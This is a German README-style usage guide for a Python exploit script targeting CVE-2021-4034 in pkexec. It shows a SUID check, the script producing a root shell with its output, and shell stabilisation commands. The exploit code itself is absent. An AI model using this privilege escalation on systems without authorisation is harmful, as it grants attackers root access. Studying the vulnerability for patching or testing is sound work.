
Python-Skript über die Schwachstelle CVE-2021-4034
CVE-2021-4034 (pkexec) Die Verwendung dieses Python-Skripts nutzt die Schwachstelle in der Datei pkexec aus, um ohne Angabe von Anmeldeinformationen Root-Zugriff zu erlangen
· Erkennt, ob die Binärdatei SUID-Privilegien hat. In diesem Fall ist sie angreifbar.
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· Führt den Exploit aus, um Root-Zugriff zu erlangen. In diesem Fall muss er nur mit python3 ausgeführt werden. Nach Abschluss erhältst du eine Root-Shell.
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· Ergänzend kannst du den Wert von TERM auf 'xterm' oder 'xterm-256color' ändern, um die Optik zu verbessern, und eine andere Shell wie 'bash' oder 'zsh' ausführen. Jetzt haben wir eine vollständig interaktive Konsole.
# export TERM=xterm-256color
# zsh
root@gatogamer $